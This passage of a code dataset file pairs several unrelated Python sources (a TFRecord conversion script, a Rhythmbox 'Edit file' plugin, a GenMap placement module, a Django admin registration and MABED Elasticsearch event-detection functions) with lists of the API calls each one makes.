(['[label]'], {}), '([label])\n', (9764, 9773), False, 'import torch\n'), ((10533, 10555), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (10553, 10555), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((25417, 25462), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25460, 25462), False, 'from apex.transformer import parallel_state\n'), ((7728, 7773), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7771, 7773), False, 'from apex.transformer import parallel_state\n'), ((10469, 10514), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (10512, 10514), False, 'from apex.transformer import parallel_state\n'), ((16370, 16422), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name} lang {k} : {v}"""'], {}), "(f'{mode} {metric_name} lang {k} : {v}')\n", (16382, 16422), False, 'from nemo.utils import AppState, logging\n'), ((2912, 2944), 'nemo.collections.common.metrics.MetricStringToTorchMetric.keys', 'MetricStringToTorchMetric.keys', ([], {}), '()\n', (2942, 2944), False, 'from nemo.collections.common.metrics import MetricStringToTorchMetric\n'), ((25250, 25295), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25293, 25295), False, 'from apex.transformer import parallel_state\n'), ((27804, 27849), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27847, 27849), False, 'from apex.transformer import parallel_state\n')]
|
"""
準備用:データセットをTFRecord形式にする
"""
import tensorflow as tf
from absl import flags
from absl import app
from glob import glob
from tensorflow.keras.preprocessing.image import load_img, img_to_array
FLAGS = flags.FLAGS
# Command-line flags: the four dataset folders (train/test x original/remake).
flags.DEFINE_string('old_image_path', "./datasets/original_data", 'Path to the data folder')
flags.DEFINE_string('new_image_path', "./datasets/remake_data", 'Path to the data folder')
flags.DEFINE_string('test_old_image_path', "./datasets/test_original", 'Path to the data folder')
flags.DEFINE_string('test_new_image_path', "./datasets/test_remake", 'Path to the data folder')
# old_label = [str(0) for i in range(len(old_paths))]
# new_label = [str(1) for i in range(len(new_paths))]
def save_tfrec(paths, name):
    """Write the raw bytes of each file in `paths` into '<name>.tfrec'.

    Args:
        paths: list of image file paths to serialize.
        name: output file name stem; the '.tfrec' suffix is appended.
    """
    file_bytes = tf.data.Dataset.from_tensor_slices(paths).map(tf.io.read_file)
    writer = tf.data.experimental.TFRecordWriter(name + '.tfrec')
    writer.write(file_bytes)
def run_main(argv):
    """absl entry point: discard positional argv and forward flag values to main()."""
    del argv
    main(
        old_path=FLAGS.old_image_path,
        new_path=FLAGS.new_image_path,
        test_old_path=FLAGS.test_old_image_path,
        test_new_path=FLAGS.test_new_image_path,
    )
def main(old_path, new_path, test_old_path, test_new_path):
    """Collect 'image_*' files from each dataset folder and write one
    TFRecord per split (old/new train sets and their test counterparts)."""
    splits = {
        'old': old_path,
        'new': new_path,
        'test_old': test_old_path,
        'test_new': test_new_path,
    }
    # dict preserves insertion order, so splits are written in the same
    # order as the original (old, new, test_old, test_new).
    for split_name, folder in splits.items():
        save_tfrec(glob(folder + "/image_*"), split_name)
if __name__ == '__main__':
    # app.run parses the command-line flags before invoking run_main.
    app.run(run_main)
|
[
"tensorflow.data.Dataset.from_tensor_slices",
"absl.flags.DEFINE_string",
"absl.app.run",
"tensorflow.data.experimental.TFRecordWriter",
"glob.glob"
] |
[((217, 313), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""old_image_path"""', '"""./datasets/original_data"""', '"""Path to the data folder"""'], {}), "('old_image_path', './datasets/original_data',\n 'Path to the data folder')\n", (236, 313), False, 'from absl import flags\n'), ((310, 404), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""new_image_path"""', '"""./datasets/remake_data"""', '"""Path to the data folder"""'], {}), "('new_image_path', './datasets/remake_data',\n 'Path to the data folder')\n", (329, 404), False, 'from absl import flags\n'), ((401, 502), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""test_old_image_path"""', '"""./datasets/test_original"""', '"""Path to the data folder"""'], {}), "('test_old_image_path', './datasets/test_original',\n 'Path to the data folder')\n", (420, 502), False, 'from absl import flags\n'), ((499, 598), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""test_new_image_path"""', '"""./datasets/test_remake"""', '"""Path to the data folder"""'], {}), "('test_new_image_path', './datasets/test_remake',\n 'Path to the data folder')\n", (518, 598), False, 'from absl import flags\n'), ((827, 879), 'tensorflow.data.experimental.TFRecordWriter', 'tf.data.experimental.TFRecordWriter', (["(name + '.tfrec')"], {}), "(name + '.tfrec')\n", (862, 879), True, 'import tensorflow as tf\n'), ((1248, 1275), 'glob.glob', 'glob', (["(old_path + '/image_*')"], {}), "(old_path + '/image_*')\n", (1252, 1275), False, 'from glob import glob\n'), ((1292, 1319), 'glob.glob', 'glob', (["(new_path + '/image_*')"], {}), "(new_path + '/image_*')\n", (1296, 1319), False, 'from glob import glob\n'), ((1341, 1373), 'glob.glob', 'glob', (["(test_old_path + '/image_*')"], {}), "(test_old_path + '/image_*')\n", (1345, 1373), False, 'from glob import glob\n'), ((1395, 1427), 'glob.glob', 'glob', (["(test_new_path + '/image_*')"], {}), "(test_new_path + '/image_*')\n", (1399, 1427), False, 'from glob import glob\n'), 
((1614, 1631), 'absl.app.run', 'app.run', (['run_main'], {}), '(run_main)\n', (1621, 1631), False, 'from absl import app\n'), ((752, 793), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['paths'], {}), '(paths)\n', (786, 793), True, 'import tensorflow as tf\n')]
|
# -*- Mode: python; coding: utf-8; tab-width: 4; indent-tabs-mode: nil; -*-
#
# edit-file.py
#
# Adds an option to edit the file containing the selected track
# to the right click context menu.
# Based on code in
#
# Partly based on code in https://github.com/donaghhorgan/rhythmbox-plugins-open-containing-folder/blob/master/OpenContainingFolder.py
from gi.repository import Gio, GObject, Gtk, Peas, RB
import subprocess
import urllib
class EditFile(GObject.Object, Peas.Activatable):
    """Adds an option to edit the file containing the selected track to
    the right click context menu."""

    object = GObject.property(type=GObject.Object)

    # Name of the Gio action registered with the application.
    _action = 'edit-file'
    # Context menus that receive the "Edit file" item.
    _locations = ['browser-popup',
                  'playlist-popup',
                  'podcast-episode-popup',
                  'queue-popup']

    def __init__(self):
        super(EditFile, self).__init__()
        self._app = Gio.Application.get_default()

    def edit_file(self, *args):
        """Open the first selected track's file in an external editor.

        Args:
            args: Additional arguments. These are ignored.
        """
        page = self.object.props.selected_page
        try:
            # Fetch the selection once (the original fetched it twice and
            # discarded the first result).
            selected = page.get_entry_view().get_selected_entries()
            if selected:
                uri = urllib.parse.unquote(selected[0].get_playback_uri())
                print('edit-file plugin: uri==<{}>'.format(uri))
                # Strip only a leading 'file://' scheme; the original
                # replace() removed the substring anywhere in the path.
                abspath = uri[len("file://"):] if uri.startswith("file://") else uri
                print('edit-file plugin: abspath==<{}>'.format(abspath))
                subprocess.Popen(['audacity', abspath])
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            print('edit-file plugin: Could not edit file')

    def do_activate(self):
        """Activate the plugin: register the action and add the menu items."""
        print('edit-file plugin: Activating')
        action = Gio.SimpleAction(name=EditFile._action)
        action.connect('activate', self.edit_file)
        self._app.add_action(action)
        item = Gio.MenuItem()
        item.set_label('Edit file')
        item.set_detailed_action('app.%s' % EditFile._action)
        for location in EditFile._locations:
            self._app.add_plugin_menu_item(location,
                                           EditFile._action,
                                           item)

    def do_deactivate(self):
        """Deactivate the plugin: remove the menu items again."""
        print('edit-file plugin: Deactivating')
        for location in EditFile._locations:
            self._app.remove_plugin_menu_item(location,
                                              EditFile._action)
|
[
"gi.repository.Gio.MenuItem",
"subprocess.Popen",
"gi.repository.Gio.Application.get_default",
"gi.repository.GObject.property",
"gi.repository.Gio.SimpleAction"
] |
[((628, 665), 'gi.repository.GObject.property', 'GObject.property', ([], {'type': 'GObject.Object'}), '(type=GObject.Object)\n', (644, 665), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((926, 955), 'gi.repository.Gio.Application.get_default', 'Gio.Application.get_default', ([], {}), '()\n', (953, 955), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1849, 1888), 'gi.repository.Gio.SimpleAction', 'Gio.SimpleAction', ([], {'name': 'EditFile._action'}), '(name=EditFile._action)\n', (1865, 1888), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1993, 2007), 'gi.repository.Gio.MenuItem', 'Gio.MenuItem', ([], {}), '()\n', (2005, 2007), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1607, 1646), 'subprocess.Popen', 'subprocess.Popen', (["['audacity', abspath]"], {}), "(['audacity', abspath])\n", (1623, 1646), False, 'import subprocess\n')]
|
# This file is part of GenMap and released under the MIT License, see LICENSE.
# Author: <NAME>
import networkx as nx
import random
import math
from multiprocessing import Pool
import multiprocessing as multi
class Placer():
    """Generates initial operation-to-PE-array mappings for a data-flow-graph.

    Supported strategies (the `method` constructor argument):
        1. "graphviz": lay the DFG out with dot and round node positions
                       onto the array (parallelized over worker processes)
        2. "tsort":    random placement biased towards topological order
        3. other:      fully random placement
    """

    def __init__(self, method, iterations = 50, randomness = "Full"):
        """ Initializes this class

            Args:
                method (str) : initial mapping method
                    available methods are as follows:
                        1. graphviz (default)
                        2. tsort
                        3. random
                iterations (int): maximum iteration number for generating a node position.
                                    Default = 50
                randomness (str): randomness of rounding.
                    if it is "Full", then the positions are rounded fully randomly.
                    if it is "Partial", then partially randomly.

            Raises:
                ValueError: if `randomness` is neither "Full" nor "Partial".
        """
        self.__iterations = iterations
        self.__method = method
        if not randomness in ["Full", "Partial"]:
            raise ValueError("Invalid randomness type: " + randomness)
        else:
            self.__randomness = randomness

    def generate_init_mappings(self, dag, width, height, count, proc_num=None):
        """Returns multiple initial mappings.

            Args:
                dag (networkx DiGraph): data-flow-graph
                width (int): PE array width
                height (int): PE array height
                count (int): try count to generate mappings
            Optional:
                proc_num (int): the number of worker processes.
                    Defaults to the CPU count, resolved at call time (the
                    original evaluated multi.cpu_count() once, when the
                    class was defined).
            Returns:
                list: a list of mappings
        """
        if proc_num is None:
            proc_num = multi.cpu_count()
        if self.__method == "graphviz":
            mt_args = [(dag, random.randint(1, width), height) for i in range(count)]
            p = Pool(proc_num)
            results = p.map(self.mt_wrapper, mt_args)
            p.close()
            init_mapping = []
            seen_mappings = set()   # hashable snapshots, for duplicate checking
            for mapping in results:
                # remove invalid (failed) attempts
                if mapping is None:
                    continue
                # Bug fix: the original stored dict_values objects in a set;
                # those compare by identity, so duplicates were never caught.
                key = frozenset(mapping.items())
                if key not in seen_mappings:
                    init_mapping.append(mapping)
                    seen_mappings.add(key)
            return init_mapping
        elif self.__method == "tsort":
            return self.make_random_mappings(dag, width, height, count, 1)
        else:
            return self.make_random_mappings(dag, width, height, count, 0)

    def mt_wrapper(self, args):
        """Unpacks an argument tuple for Pool.map (which passes a single value)."""
        return self.make_graphviz_mapping(*args)

    def make_graphviz_mapping(self, dag, width, height):
        """ Makes nodes position on the PE array.

            Args:
                dag (networkx DiGraph): data-flow-graph
                width (int): PE array width
                height (int): PE array height

            Returns:
                Dictionary: keys are operation labels, values are mapped positions.
                            In case of failure, returns None
        """
        # validate input dag
        if nx.is_directed_acyclic_graph(dag) == False:
            raise ValueError("Input data-flow-graph is not DAG")

        # check dag size
        node_num = len(dag.nodes())
        if node_num > width * height:
            return None

        # enumerate possible rectangles large enough to hold all nodes
        rect_pattern = [(w, h) for w in range(1, width + 1) for h in range(1, height + 1) if w * h >= node_num]

        # graph layout by dot's algorithm
        pos = nx.nx_pydot.graphviz_layout(dag, prog="dot")

        # normalize coordinates into the unit square
        max_x = max([x for (x, y) in pos.values()])
        max_y = max([y for (x, y) in pos.values()])
        pos = {v: (x / max_x, y / max_y) for v, (x, y) in pos.items()}

        # make sink nodes upper side
        pos = {v: (x, 1 - y) for v, (x, y) in pos.items()}

        # randomly rotate by 90 deg.
        if random.randint(0, 1) == 0:
            pos = {v: (y, 1 - x) for v, (x, y) in pos.items()}

        # randomly flip x position
        if random.randint(0, 1) == 0:
            pos = {v: (1 - x, y) for v, (x, y) in pos.items()}

        # choose a rectangle pattern
        (map_width, map_height) = rect_pattern[random.randint(0, len(rect_pattern) - 1)]

        # scale to actual coordinates on the chosen rectangle
        pos = {v: ((map_width - 1) * x, (map_height - 1) * y) for v, (x, y) in pos.items()}

        # try to round the coordinates; remember the attempt with the
        # fewest collisions in case no collision-free rounding is found
        best_mapping_lest = len(pos)
        for i in range(self.__iterations):
            mapping = {v: self.__coord_rouding((x, y)) for v, (x, y) in pos.items()}
            # check duplication
            duplicated_node_num = len(list(mapping.values())) - len(set(mapping.values()))
            if duplicated_node_num == 0:
                break
            elif duplicated_node_num < best_mapping_lest:
                best_mapping = mapping
                best_mapping_lest = duplicated_node_num
        else:
            # rounding failed within the iteration budget:
            # resolve the remaining collisions greedily.
            # get duplicated nodes
            duplicated_nodes = {coord: [v for v in best_mapping.keys() if best_mapping[v] == coord] \
                                for coord in set(best_mapping.values()) \
                                if list(best_mapping.values()).count(coord) > 1}
            # keep one randomly chosen occupant per contested coordinate
            for coord in duplicated_nodes:
                duplicated_nodes[coord].pop(\
                    random.randint(0, len(duplicated_nodes[coord]) - 1))
            # sort in order of least node count
            duplicated_nodes = dict(sorted(duplicated_nodes.items(), key=lambda x: - len(x[1])))
            # get free coordinates
            free_coords = [(x, y) for x in range(map_width) for y in range(map_height)\
                            if not (x, y) in best_mapping.values()]
            # move each evicted node to the nearest free PE
            for coord, nodes in duplicated_nodes.items():
                for v in nodes:
                    dists = [math.sqrt((x - coord[0]) ** 2 + (y - coord[1]) ** 2) \
                                for (x, y) in free_coords]
                    nearest_pos = free_coords[dists.index(min(dists))]
                    free_coords.remove(nearest_pos)
                    best_mapping[v] = nearest_pos
            return best_mapping

        return mapping

    @staticmethod
    def make_random_mappings(dag, width, height, size, sort_prob = 0.5):
        """ Generate random mappings

            Args:
                dag (networkx DiGraph): data-flow-graph
                width (int): PE array width
                height (int): PE array height
                size (int): The number of mappings to be generated
            Option:
                sort_prob (float): topological sort probability.

            Returns:
                list: generated mappings
        """
        # validate input dag
        if nx.is_directed_acyclic_graph(dag) == False:
            raise ValueError("Input data-flow-graph is not DAG")

        # check dag size
        node_num = len(dag.nodes())
        if node_num > width * height:
            return None

        # enumerate possible rectangles
        rect_pattern = [(w, h) for w in range(1, width + 1) for h in range(1, height + 1) if w * h >= node_num]

        rtn_list = []
        for i in range(size):
            # decide whether this mapping follows topological order
            topological_sort_enable = random.random() < sort_prob
            (map_width, map_height) = rect_pattern[random.randint(0, len(rect_pattern) - 1)]
            positions = random.sample([(x, y) for x in range(map_width) for y in range(map_height)], node_num)
            if topological_sort_enable:
                # pick a random corner of the top row as the distance origin
                if random.randint(0, 1) == 0:
                    origin = (0, 0)
                else:
                    origin = (map_width - 1, 0)
                positions = sorted(positions, key=lambda x: \
                                    (x[0] - origin[0])**2 + (x[1] - origin[1]) ** 2)
                rtn_list.append({k: v for k, v in zip(list(nx.topological_sort(dag)), positions)})
            else:
                rtn_list.append({k: v for k, v in zip(dag.nodes(), positions)})

        return rtn_list

    @staticmethod
    def __if_keep_dependency(dag, mapping):
        """Check dependency between operations.

            Args:
                dag (networkx digraph): data-flow-graph to be mapped
                mapping (dict): operation mapping
                    keys: operation labels
                    values: PE coordinates where the nodes are mapped

            Returns:
                bool: True if no edge points to a smaller row index.
        """
        valid = True
        for u, v in dag.edges():
            if mapping[u][1] > mapping[v][1]:
                valid = False
                break
        return valid

    def __coord_rouding(self, coord):
        """ Round a float value coordinate to an int value coordinate.

            Args:
                coord: a list-like coordinate

            Return:
                a tuple: rounded coordinate
        """
        if self.__randomness == "Full":
            # Either ceil or floor is used randomly
            x_ceil = random.randint(0, 1) == 0
            y_ceil = random.randint(0, 1) == 0
        elif self.__randomness == "Partial":
            # extract after the decimal points
            x_dec = coord[0] - int(coord[0])
            # Bug fix: the original derived y_dec from coord[0] as well,
            # so the y rounding probability ignored the actual y value.
            y_dec = coord[1] - int(coord[1])
            # decide ceil or floor depending on the decimal
            x_ceil = random.random() < x_dec
            y_ceil = random.random() < y_dec

        if x_ceil and y_ceil:
            return (math.ceil(coord[0]), math.ceil(coord[1]))
        elif x_ceil and not y_ceil:
            return (math.ceil(coord[0]), math.floor(coord[1]))
        elif not x_ceil and y_ceil:
            return (math.floor(coord[0]), math.ceil(coord[1]))
        else:
            return (math.floor(coord[0]), math.floor(coord[1]))
|
[
"random.randint",
"math.sqrt",
"math.ceil",
"math.floor",
"networkx.topological_sort",
"random.random",
"multiprocessing.Pool",
"networkx.nx_pydot.graphviz_layout",
"networkx.is_directed_acyclic_graph",
"multiprocessing.cpu_count"
] |
[((1348, 1365), 'multiprocessing.cpu_count', 'multi.cpu_count', ([], {}), '()\n', (1363, 1365), True, 'import multiprocessing as multi\n'), ((3770, 3814), 'networkx.nx_pydot.graphviz_layout', 'nx.nx_pydot.graphviz_layout', (['dag'], {'prog': '"""dot"""'}), "(dag, prog='dot')\n", (3797, 3814), True, 'import networkx as nx\n'), ((2006, 2020), 'multiprocessing.Pool', 'Pool', (['proc_num'], {}), '(proc_num)\n', (2010, 2020), False, 'from multiprocessing import Pool\n'), ((3327, 3360), 'networkx.is_directed_acyclic_graph', 'nx.is_directed_acyclic_graph', (['dag'], {}), '(dag)\n', (3355, 3360), True, 'import networkx as nx\n'), ((4169, 4189), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (4183, 4189), False, 'import random\n'), ((4306, 4326), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (4320, 4326), False, 'import random\n'), ((7257, 7290), 'networkx.is_directed_acyclic_graph', 'nx.is_directed_acyclic_graph', (['dag'], {}), '(dag)\n', (7285, 7290), True, 'import networkx as nx\n'), ((7711, 7726), 'random.random', 'random.random', ([], {}), '()\n', (7724, 7726), False, 'import random\n'), ((9541, 9561), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (9555, 9561), False, 'import random\n'), ((9588, 9608), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (9602, 9608), False, 'import random\n'), ((9997, 10016), 'math.ceil', 'math.ceil', (['coord[0]'], {}), '(coord[0])\n', (10006, 10016), False, 'import math\n'), ((10018, 10037), 'math.ceil', 'math.ceil', (['coord[1]'], {}), '(coord[1])\n', (10027, 10037), False, 'import math\n'), ((1932, 1956), 'random.randint', 'random.randint', (['(1)', 'width'], {}), '(1, width)\n', (1946, 1956), False, 'import random\n'), ((8119, 8139), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (8133, 8139), False, 'import random\n'), ((9877, 9892), 'random.random', 'random.random', ([], {}), '()\n', (9890, 9892), False, 'import 
random\n'), ((9922, 9937), 'random.random', 'random.random', ([], {}), '()\n', (9935, 9937), False, 'import random\n'), ((10095, 10114), 'math.ceil', 'math.ceil', (['coord[0]'], {}), '(coord[0])\n', (10104, 10114), False, 'import math\n'), ((10116, 10136), 'math.floor', 'math.floor', (['coord[1]'], {}), '(coord[1])\n', (10126, 10136), False, 'import math\n'), ((6343, 6395), 'math.sqrt', 'math.sqrt', (['((x - coord[0]) ** 2 + (y - coord[1]) ** 2)'], {}), '((x - coord[0]) ** 2 + (y - coord[1]) ** 2)\n', (6352, 6395), False, 'import math\n'), ((10194, 10214), 'math.floor', 'math.floor', (['coord[0]'], {}), '(coord[0])\n', (10204, 10214), False, 'import math\n'), ((10216, 10235), 'math.ceil', 'math.ceil', (['coord[1]'], {}), '(coord[1])\n', (10225, 10235), False, 'import math\n'), ((10271, 10291), 'math.floor', 'math.floor', (['coord[0]'], {}), '(coord[0])\n', (10281, 10291), False, 'import math\n'), ((10293, 10313), 'math.floor', 'math.floor', (['coord[1]'], {}), '(coord[1])\n', (10303, 10313), False, 'import math\n'), ((8458, 8482), 'networkx.topological_sort', 'nx.topological_sort', (['dag'], {}), '(dag)\n', (8477, 8482), True, 'import networkx as nx\n')]
|
from django.contrib import admin

# Register your models here.
from .models import Coin

# Expose the Coin model in the Django admin interface.
admin.site.register(Coin)
|
[
"django.contrib.admin.site.register"
] |
[((89, 114), 'django.contrib.admin.site.register', 'admin.site.register', (['Coin'], {}), '(Coin)\n', (108, 114), False, 'from django.contrib import admin\n')]
|
# coding: utf-8
import timeit
import json
import time
from flask import jsonify
from mabed.es_corpus import Corpus
from mabed.mabed import MABED
from mabed.es_connector import Es_connector
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from nltk.tokenize import word_tokenize
__author__ = "<NAME>"
__email__ = "<EMAIL>"
# Interface Functions
class Functions:
def __init__(self):
self.sessions_index = 'mabed_sessions'
self.sessions_doc_type = 'session'
# print("Functions init")
# ==================================================================
# Event Detection
# ==================================================================
def detect_events(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, cluster=2):
sw = 'stopwords/twitter_all.txt'
sep = '\t'
print('Parameters:')
print(
' Index: %s\n k: %d\n Stop-words: %s\n Min. abs. word frequency: %d\n Max. rel. word frequency: %f' %
(index, k, sw, maf, mrf))
print(' p: %d\n theta: %f\n sigma: %f' % (p, theta, sigma))
print('Loading corpus...')
start_time = timeit.default_timer()
my_corpus = Corpus(sw, maf, mrf, sep, index=index)
elapsed = timeit.default_timer() - start_time
print('Corpus loaded in %f seconds.' % elapsed)
time_slice_length = tsl
print('Partitioning tweets into %d-minute time-slices...' % time_slice_length)
start_time = timeit.default_timer()
my_corpus.discretize(time_slice_length, cluster)
elapsed = timeit.default_timer() - start_time
print('Partitioning done in %f seconds.' % elapsed)
print('Running MABED...')
start_time = timeit.default_timer()
mabed = MABED(my_corpus)
mabed.run(k=k, p=p, theta=theta, sigma=sigma)
elapsed = timeit.default_timer() - start_time
print('Event detection performed in %f seconds.' % elapsed)
return mabed
def event_descriptions(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, cluster=2):
mabed = self.detect_events(index, k, maf, mrf, tsl, p, theta, sigma, cluster)
# format data
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple())) * 1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
# related_terms.append(related_term[0] + ' (' + str("{0:.2f}".format(related_term[1])) + ')')
related_terms.append({'word':related_term[0], 'value':str("{0:.2f}".format(related_term[1])) })
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
json.dumps(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append([ formatted_dates[i],value])
impact_data.append({"key": main_term, "values": formatted_anomaly})
return {"event_descriptions": event_descriptions, "impact_data": impact_data}
def detect_filtered_events(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, session=False, filter=False, cluster=2):
sw = 'stopwords/twitter_all.txt'
sep = '\t'
print('Parameters:')
print(
' Index: %s\n k: %d\n Stop-words: %s\n Min. abs. word frequency: %d\n Max. rel. word frequency: %f' %
(index, k, sw, maf, mrf))
print(' p: %d\n theta: %f\n sigma: %f' % (p, theta, sigma))
print('Loading corpus...')
start_time = timeit.default_timer()
my_corpus = Corpus(sw, maf, mrf, sep, index=index, session=session, filter=filter)
if not my_corpus.tweets:
return False
elapsed = timeit.default_timer() - start_time
print('Corpus loaded in %f seconds.' % elapsed)
time_slice_length = tsl
print('Partitioning tweets into %d-minute time-slices...' % time_slice_length)
start_time = timeit.default_timer()
my_corpus.discretize(time_slice_length, cluster)
elapsed = timeit.default_timer() - start_time
print('Partitioning done in %f seconds.' % elapsed)
print('Running MABED...')
start_time = timeit.default_timer()
mabed = MABED(my_corpus)
mabed.run(k=k, p=p, theta=theta, sigma=sigma)
elapsed = timeit.default_timer() - start_time
print('Event detection performed in %f seconds.' % elapsed)
return mabed
def filtered_event_descriptions(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, session=False, filter=False, cluster=2):
mabed = self.detect_filtered_events(index, k, maf, mrf, tsl, p, theta, sigma, session, filter, cluster)
if not mabed:
return False
# format data
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple())) * 1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
# related_terms.append(related_term[0] + ' (' + str("{0:.2f}".format(related_term[1])) + ')')
related_terms.append({'word':related_term[0], 'value':str("{0:.2f}".format(related_term[1])) })
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
json.dumps(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append([ formatted_dates[i],value])
impact_data.append({"key": main_term, "values": formatted_anomaly})
return {"event_descriptions": event_descriptions, "impact_data": impact_data}
# ==================================================================
# Tweets
# ==================================================================
def get_tweets(self, index="test3", word=""):
my_connector = Es_connector(index=index)
# res = my_connector.search({
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
# res = my_connector.bigSearch(
# {
# "_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
res = my_connector.init_paginatedSearch({
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_tweets_scroll(self, index, sid, scroll_size):
my_connector = Es_connector(index=index)
res = my_connector.loop_paginatedSearch(sid, scroll_size)
return res
def get_big_tweets(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.bigSearch(
{
"_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_tweets_state(self, index="test3", session="",state="proposed"):
my_connector = Es_connector(index=index)
res = my_connector.init_paginatedSearch(
{
"query": {
"term": {
"session_"+session: state
}
}
})
return res
def get_tweets_query_state(self, index="test3", word="", state="proposed", session=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"filter": {
"bool": {
"should": [
{
"match": {
session: state
}
}
]
}
}
}
}
}
res = my_connector.init_paginatedSearch(query)
return res
def get_big_tweets_scroll(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.init_paginatedSearch(
{
"_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_event_tweets(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# res = my_connector.search({"query": {"term" : { "text" : word }}})
# query = {
# "bool": {
# "must": {
# "match": {
# "text": {
# "query": main_term,
# "operator": "or"
# }
# }
# },
# "should": terms
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
# print(query)
# res = my_connector.search(query)
res = my_connector.init_paginatedSearch(query)
return res
def get_event_filter_tweets(self, index="test3", main_term="", related_terms="", state = "proposed", session=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# query = {
# "sort": [
# "_score"
# ],
# "query": {
# "bool": {
# "should": terms
# }
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"must": [
{
"bool": {
"should": terms
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
session: state
}
}
]
}
}
}
}
}
res = my_connector.init_paginatedSearch(query)
return res
def get_event_tweets2(self, index="test3", main_term="", related_terms="", cid =0):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# terms.append({"match": {
# "imagesCluster": {
# "query": cid
# }
# }})
# query = {
# "query": {
# "bool": {
# "must": {
# "exists": {
# "field": "imagesCluster"
# }
# },
# # "must": { "match": { "imagesCluster" : cid }},
# "should": terms
# }
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms,
"minimum_should_match": 1,
"must": [
{
"match": {
"imagesCluster": cid
}
}
]
}
}
}
# res = my_connector.bigSearch(query)
